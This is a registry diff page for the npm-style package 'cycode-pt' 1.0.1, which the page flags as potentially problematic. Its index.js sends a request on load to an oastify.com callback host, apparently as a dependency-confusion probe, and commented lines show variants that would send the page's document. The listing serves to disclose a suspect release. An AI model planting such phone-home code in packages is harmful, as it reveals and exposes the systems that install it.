cycode-pt 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of cycode-pt might be problematic. Click here for more details.
- package/README.md +1 -0
- package/index.js +12 -0
- package/package.json +11 -0
package/README.md
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
Don't use this REPO.
|
package/index.js
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
const xhr = new XMLHttpRequest();
|
|
2
|
+
xhr.open('GET', 'https://qwq5pkc5w9hxux3f50ch6bb3nutohg55.oastify.com/test-js', true);
|
|
3
|
+
|
|
4
|
+
xhr.onload = () => {
|
|
5
|
+
// Request finished. Do processing here.
|
|
6
|
+
};
|
|
7
|
+
|
|
8
|
+
xhr.send(null);
|
|
9
|
+
// xhr.send('string');
|
|
10
|
+
// xhr.send(new Blob());
|
|
11
|
+
// xhr.send(new Int8Array());
|
|
12
|
+
// xhr.send(document);
|